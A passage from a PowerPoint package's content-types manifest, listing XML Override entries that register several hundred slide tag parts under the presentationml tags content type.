  <Override PartName="/ppt/tags/tag50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag500.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag501.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag502.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag503.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag504.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag505.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag506.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag507.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag508.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag509.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag510.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag511.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag512.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag513.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag514.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag515.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag516.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag517.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag518.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag519.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag520.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag521.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag522.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag523.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag524.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag525.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag526.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag527.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag528.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag529.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag53.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag530.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag531.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag532.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag533.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag534.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag535.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag536.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag537.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag538.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag539.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag540.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag541.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag542.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag543.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag544.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag545.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag546.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag547.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag548.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag549.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag550.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag551.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag552.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag553.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag554.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag555.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag556.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag557.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag558.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag559.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag560.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag561.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag562.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag563.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag564.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag565.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag566.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag567.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag568.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag569.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag570.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag571.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag572.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag573.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag574.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag575.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag576.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag577.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag578.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag579.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag580.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag581.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag582.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag583.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag584.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag585.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag586.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag587.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag588.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag589.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag590.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag591.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag592.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag593.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag594.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag595.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag596.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag597.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag598.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag599.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag600.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag601.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag602.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag603.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag604.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag605.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag606.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag607.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag608.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag609.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag61.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag610.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag611.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag612.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag613.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag614.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag615.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag616.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag617.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag618.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag619.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag62.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag620.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag621.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag622.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag623.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag624.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag625.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag626.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag627.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag628.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag629.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag630.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag631.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag632.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag633.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag634.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag635.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag636.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag637.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag638.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag639.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag64.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag640.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag641.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag642.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag643.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag644.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag645.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag646.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag647.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag648.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag649.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag65.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag650.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag651.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag652.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag653.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag654.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag655.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag656.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag657.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag658.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag659.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag66.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag660.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag661.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag662.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag663.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag664.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag665.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag666.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag667.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag668.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag669.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag67.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag670.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag671.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag672.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag673.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag674.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag675.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag676.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag677.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag678.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag679.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag68.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag680.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag681.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag682.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag683.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag684.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag685.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag686.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag687.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag688.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag689.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag69.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag690.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag691.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag692.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag693.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag694.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag695.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag696.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag697.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag698.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag699.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag70.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag700.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag701.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag702.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag703.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag704.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag705.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag706.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag707.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag708.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag709.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag71.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag710.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag711.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag712.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag713.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag714.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag715.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag716.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag717.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag718.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag719.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag72.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag720.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag721.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag722.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag723.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag724.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
